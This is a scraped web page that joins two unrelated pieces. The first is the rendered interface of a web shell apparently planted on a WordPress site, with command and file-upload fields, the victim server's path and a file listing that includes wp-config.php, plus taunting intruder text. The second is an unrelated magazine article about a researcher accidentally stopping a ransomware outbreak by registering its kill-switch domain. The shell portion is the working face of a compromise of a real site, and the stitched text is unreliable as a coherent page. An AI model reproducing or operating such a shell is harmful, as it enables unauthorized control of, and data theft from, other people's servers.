N4ST4R_ID priv mini shell


Disable Functions: Aman Tod >:(
Path : /home/nuorigins/public_html/
File Upload :
Command :

Name
Size
Permission
Modify
.qidb
--
drwxr-xr-x
.well-known
--
drwxr-xr-x
cgi-bin
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.788 KB
-rw-r--r--
ads.txt
0.039 KB
-rwxrwxrwx
error_log
366.003 KB
-rw-r--r--
index.php
0.408 KB
-rw-r--r--
license.txt
19.468 KB
-rw-r--r--
php.ini
0.038 KB
-rw-r--r--
readme.html
7.241 KB
-rw-r--r--
wp-activate.php
5.33 KB
-rw-r--r--
wp-blog-header.php
0.355 KB
-rw-r--r--
wp-comments-post.php
1.845 KB
-rw-r--r--
wp-config-sample.php
2.786 KB
-rw-r--r--
wp-config.php
2.706 KB
-rw-r--r--
wp-cron.php
3.583 KB
-rw-r--r--
wp-links-opml.php
2.365 KB
-rw-r--r--
wp-load.php
3.229 KB
-rw-r--r--
wp-login.php
36.875 KB
-rw-r--r--
wp-mail.php
7.859 KB
-rw-r--r--
wp-settings.php
15.865 KB
-rw-r--r--
wp-signup.php
29.386 KB
-rw-r--r--
wp-trackback.php
4.512 KB
-rw-r--r--
xmlrpc.php
2.993 KB
-rw-r--r--
z.htm
4.92 KB
-rw-r--r--

Indonesian Error System
[ KLIK LAH KIMAK ]
Ransomware Attacked Stopped By Accident | Nu Origins Magazine

Yesterday’s global ransomware attack was scary for several reasons, but quick action by a security researcher at MalwareTech at least put an end to its spreading — although the researcher didn’t realize it at the time. The whole story is here, but the gist is this. The ransomware, as you may have heard, was spreading using an exploit disclosed from NSA records by the Shadow Brokers last month. It had the potential to spread quickly and far, as it in fact did, and in doing so attract the attention of IT people who would want to contain and study it.

As a safety against this, the payload contained some code that queried a certain domain known to the authors to be unregistered. This is because some network environments, such as contained VMs in which to study malicious code, will capture all outgoing data, like an attempt to connect to a domain, and return traffic of its own choosing.
The ransomware wanted to avoid activating itself in an environment like this, so it was designed to ping a certain unregistered domain — say, afn38sj729.com — and if it returns anything but a DNS error, chances are that its traffic is being manipulated, so it shuts down to avoid further analysis.

The security researcher, on seeing that the ransomware called out to this unregistered domain, immediately registered it so they could monitor the traffic (they could — producing the map above). They thought it would just help track its spreading, but in fact by registering that domain they effectively killed the whole attack. Because now when the code pinged that domain, it returned that it was registered, and therefore the ransomware would never activate itself! They’d pulled the plug and didn’t even realize it. (The researcher cottoned to it later during some tests of this type of behavior.)

It may have been accidental, but registering was the correct thing for the researcher to do — that may have been a command and control server, or perhaps it was a kill switch like this — and at any rate, you can’t argue with the results. Unfortunately, it doesn’t help people who are already hit by the ransom, but at least it prevented it rolling out further.